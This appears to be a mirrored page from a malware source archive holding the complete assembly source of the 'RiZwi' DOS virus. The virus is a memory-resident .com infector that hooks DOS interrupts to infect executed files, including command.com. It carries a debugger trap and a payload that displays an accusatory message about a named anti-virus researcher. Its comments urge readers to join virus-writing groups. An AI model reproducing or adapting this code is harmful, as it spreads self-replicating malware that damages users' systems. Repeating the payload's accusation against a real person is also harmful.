mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-24 20:35:25 +00:00
257 lines
7.3 KiB
Plaintext
257 lines
7.3 KiB
Plaintext
|
;
|
|||
|
; RiZwi Virus by John Tardy / Trident V1.1
|
|||
|
;
|
|||
|
; This is a tom-resident .com infector, including command.com. it attaches
|
|||
|
; itself at the eof. when the generation counter is between 200 and 240, a
|
|||
|
; timer counter will be started. when it reached 5000 hex ticks, it will
|
|||
|
; display a message with black chars and a red background in the upper corner.
|
|||
|
; The message says an important fact of Righard Zwienenberg, who is known in
|
|||
|
; The Netherlands as a anti-virus researcher. In fact, he did release a virus,
|
|||
|
; named "DUTCH-555". I know he did it accidentally, but you should do it. You
|
|||
|
; have to be on just one side, virus or antivirus. If you can't choose, then
|
|||
|
; stop with computing. If you choose, I hope you choose our side. It has more
|
|||
|
; possibilities and with your capabilities your virii could be well-known
|
|||
|
; (look at the VSUM for your ratings). Maybe you even choose to be part of
|
|||
|
; [NUkE] or Phalcon/Skism or even Trident.
|
|||
|
;
|
|||
|
; This is a bug-fix of V1.0, which kept the original interupt in the main
|
|||
|
; program, thus simply hanging. This one has also a little debugger trap.
|
|||
|
|
|||
|
Org 100h
|
|||
|
|
|||
|
Prg: Call On1
|
|||
|
On1: Pop Bp
|
|||
|
Sub Bp,On1
|
|||
|
Mov Ah,30h
|
|||
|
Int 21h
|
|||
|
Cmp Bx,'BC'
|
|||
|
Je Tooz
|
|||
|
|
|||
|
Mov Ah,2ah
|
|||
|
Int 21h
|
|||
|
In Al,21h
|
|||
|
Cmp Cx,1993
|
|||
|
Ja MakeRes
|
|||
|
Cmp Dh,4
|
|||
|
Ja MakeRes
|
|||
|
Tooz: Jmp DoCom
|
|||
|
|
|||
|
MakeRes: Or Al,02h
|
|||
|
Push Ax
|
|||
|
Mov Ax,351ch
|
|||
|
Int 21h
|
|||
|
Mov Word Ptr Cs:Old1c[0][Bp],Bx
|
|||
|
Mov Word Ptr Cs:Old1c[2][Bp],es
|
|||
|
Pop Ax
|
|||
|
Out 21h,Al
|
|||
|
CutIt: Mov Ax,3521h
|
|||
|
Int 21h
|
|||
|
Mov Word Ptr Cs:Old21[0][Bp],Bx
|
|||
|
Mov Word Ptr Cs:Old21[2][Bp],Es
|
|||
|
In Al,21h
|
|||
|
And Al,2
|
|||
|
Push Ax
|
|||
|
Mov Ax,Cs
|
|||
|
Dec Ax
|
|||
|
Mov Ds,Ax
|
|||
|
Cmp Byte Ptr Ds:[0],'Z'
|
|||
|
Jne DoCom
|
|||
|
Sub Word Ptr Ds:[3],PrgPar
|
|||
|
Sub Word Ptr Ds:[12h],PrgPar
|
|||
|
Lea Si,Prg[Bp]
|
|||
|
Mov Di,100h
|
|||
|
Pop Ax
|
|||
|
Cmp Al,2
|
|||
|
Jne CutIt
|
|||
|
Mov Ax,Word Ptr Ds:[12h]
|
|||
|
Sub Ax,10h
|
|||
|
Mov Es,Ax
|
|||
|
Mov Cx,PrgLen
|
|||
|
Push Cs
|
|||
|
Pop Ds
|
|||
|
Rep Movsb
|
|||
|
In Al,21h
|
|||
|
Xor Al,2
|
|||
|
Mov Ds,Es
|
|||
|
Out 21h,Al
|
|||
|
Mov Ax,251ch
|
|||
|
Lea Dx,New1c
|
|||
|
Int 21h
|
|||
|
Mov Ax,2521h
|
|||
|
Lea Dx,New21
|
|||
|
Int 21h
|
|||
|
DoCom: Push Cs
|
|||
|
Pop Ds
|
|||
|
Mov Es,Ds
|
|||
|
Mov Di,100h
|
|||
|
Push Di
|
|||
|
Lea Si,OrgPrg[Bp]
|
|||
|
Movsw
|
|||
|
Movsb
|
|||
|
Ret
|
|||
|
|
|||
|
OrgPrg DB 0CDh,020h
|
|||
|
DB '<27>'
|
|||
|
|
|||
|
Db '[TridenT]'
|
|||
|
|
|||
|
Dos: Pushf
|
|||
|
Call Dword Ptr Cs:[Old21]
|
|||
|
Ret
|
|||
|
|
|||
|
Db '{V1.1 Bugfix}'
|
|||
|
|
|||
|
Old21 DD 0
|
|||
|
New21: Cmp Ax,4b00h
|
|||
|
Je Exec
|
|||
|
Cmp Ah,30h
|
|||
|
Jne EOI
|
|||
|
Call Dos
|
|||
|
Mov Bx,'BC'
|
|||
|
Iret
|
|||
|
|
|||
|
EOI: Jmp Dword Ptr Cs:[Old21]
|
|||
|
|
|||
|
Exec: Push Ax
|
|||
|
Push Bx
|
|||
|
Push Cx
|
|||
|
Push Dx
|
|||
|
Push Si
|
|||
|
Push Di
|
|||
|
Push Ds
|
|||
|
Push Es
|
|||
|
Push Bp
|
|||
|
Push Ds
|
|||
|
Push Dx
|
|||
|
Mov Ax,4300h
|
|||
|
Call Dos
|
|||
|
Mov FAttr,Cx
|
|||
|
Xor Cx,Cx
|
|||
|
Mov Ax,4301h
|
|||
|
Call Dos
|
|||
|
Mov Ax,3d02h
|
|||
|
Call Dos
|
|||
|
Mov FHandle,Ax
|
|||
|
Xchg Ax,Bx
|
|||
|
Mov Ax,5700h
|
|||
|
Call Dos
|
|||
|
Mov Word Ptr Cs:[FTime],Cx
|
|||
|
Mov Word Ptr Cs:[FDate],Dx
|
|||
|
And Cx,1fh
|
|||
|
Cmp Cx,1fh
|
|||
|
Jne DoMore
|
|||
|
Close: Mov Ah,3eh
|
|||
|
Call Dos
|
|||
|
Pop Dx
|
|||
|
Pop Ds
|
|||
|
Mov Cx,FAttr
|
|||
|
Mov Ax,4301h
|
|||
|
Call Dos
|
|||
|
Jmp ShutDown
|
|||
|
DoMore: Mov Ah,3fh
|
|||
|
Push Cs
|
|||
|
Pop Ds
|
|||
|
Lea Dx,OrgPrg
|
|||
|
Mov Cx,3
|
|||
|
Call Dos
|
|||
|
Cmp Word Ptr Cs:[OrgPrg],'MZ'
|
|||
|
Je Close
|
|||
|
Cmp Word Ptr Cs:[OrgPrg],'ZM'
|
|||
|
Je Close
|
|||
|
Mov Ax,4202h
|
|||
|
Xor Cx,Cx
|
|||
|
Xor Dx,Dx
|
|||
|
Call Dos
|
|||
|
Sub Ax,3
|
|||
|
Mov Jump,Ax
|
|||
|
Mov Ah,40h
|
|||
|
Lea Dx,Prg
|
|||
|
Mov Cx,PrgLen
|
|||
|
Call Dos
|
|||
|
Mov Ax,4200h
|
|||
|
Xor Cx,Cx
|
|||
|
Xor Dx,Dx
|
|||
|
Call Dos
|
|||
|
Mov Ah,40h
|
|||
|
Lea Dx,Start
|
|||
|
Mov Cx,3
|
|||
|
Call Dos
|
|||
|
Mov Ax,5701h
|
|||
|
Mov Cx,FTime
|
|||
|
Mov Dx,FDate
|
|||
|
Or Cx,1fh
|
|||
|
Call Dos
|
|||
|
Inc Byte Ptr Cs:[FileCount]
|
|||
|
Jmp Close
|
|||
|
|
|||
|
ShutDown: Pop Bp
|
|||
|
Pop Es
|
|||
|
Pop Ds
|
|||
|
Pop Di
|
|||
|
Pop Si
|
|||
|
Pop Dx
|
|||
|
Pop Cx
|
|||
|
Pop Bx
|
|||
|
Pop Ax
|
|||
|
Jmp EOI
|
|||
|
|
|||
|
Old1c DD 0
|
|||
|
|
|||
|
New1c: pushf
|
|||
|
push ax
|
|||
|
push cx
|
|||
|
push si
|
|||
|
push di
|
|||
|
push ds
|
|||
|
push es
|
|||
|
Cmp Byte Ptr Cs:[FileCount],200
|
|||
|
Jb EOI16
|
|||
|
Cmp Byte Ptr Cs:[FileCount],240
|
|||
|
Ja EOI16
|
|||
|
|
|||
|
Cmp Word Ptr Cs:[ActCount],5000h
|
|||
|
Je Activate
|
|||
|
Inc Word Ptr Cs:[ActCount]
|
|||
|
Jmp EOI16
|
|||
|
|
|||
|
Activate:
|
|||
|
Mov Ds,Cs
|
|||
|
Mov Ax,0b800h
|
|||
|
|
|||
|
Mov Es,Ax
|
|||
|
Lea Si,ScrMsg
|
|||
|
Mov Di,160
|
|||
|
Sub Di,ScrLen
|
|||
|
|
|||
|
Mov Cx,ScrLen
|
|||
|
Rep MovSb
|
|||
|
|
|||
|
EOI16: pop es
|
|||
|
pop ds
|
|||
|
pop di
|
|||
|
pop si
|
|||
|
pop cx
|
|||
|
pop ax
|
|||
|
popf
|
|||
|
iret
|
|||
|
|
|||
|
ScrMsg Db ' OROiOgOhOaOrOdO OZOwOiOeOnOeOnObOeOrOgO OmOaOdOeO OtOhOeO ODOUOTOCOHO-O5O5O5O OVOiOrOuOsO!O!O!O O'
|
|||
|
ScrLen Equ $-ScrMsg
|
|||
|
|
|||
|
FileCount Db 0
|
|||
|
ActCount Dw 0
|
|||
|
Start Db 0e9h
|
|||
|
Jump Dw 0
|
|||
|
FAttr Dw 0
|
|||
|
FHandle Dw 0
|
|||
|
FDate Dw 0
|
|||
|
FTime Dw 0
|
|||
|
|
|||
|
PrgLen Equ $-Prg
|
|||
|
PrgPar Equ (PrgLen+0fh)/16
|
|||
|
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> ReMeMbEr WhErE YoU sAw ThIs pHile fIrSt <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> ArReStEd DeVeLoPmEnT +31.77.SeCrEt H/p/A/v/AV/? <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|